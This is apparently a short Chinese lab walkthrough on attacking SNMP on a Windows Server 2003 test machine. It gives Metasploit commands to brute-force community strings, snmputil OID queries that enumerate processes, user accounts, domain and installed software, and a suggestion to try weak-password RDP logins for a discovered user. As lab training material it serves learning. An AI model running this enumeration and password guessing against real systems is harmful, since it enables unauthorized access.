一、环境搭建
搜索windows Server2003安装配置snmp 服务,按照提示来就行
二、利用
1.找出Coummunity Strings
利用于 auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_login
set rhosts 192.168.131.128
set STOP_ON_SUCCESS true
set threads 15
run
在dos命令行下打开snmptuil开始刺探信息
snmputil walk 对方ip public .1.3.6.1.2.1.25.4.2.1.2 列出系统进程
snmputil walk 对方ip public .1.3.6.1.4.1.77.1.2.25.1.1 列系统用户列表
snmputil get 对方ip public .1.3.6.1.4.1.77.1.4.1.0 列出域名
snmputil walk 对方ip public .1.3.6.1.2.1.25.6.3.1.2 列出安装的软件
snmputil walk 对方ip public .1.3.6.1.2.1.1 列出系统信息
使用snmputil walk 192.168.131.128 public .1.3.6.1.4.1.77.1.2.25.1.1
可以看到有个test的用户,用nmap扫描可以发现靶机开了3389,尝试弱口令登录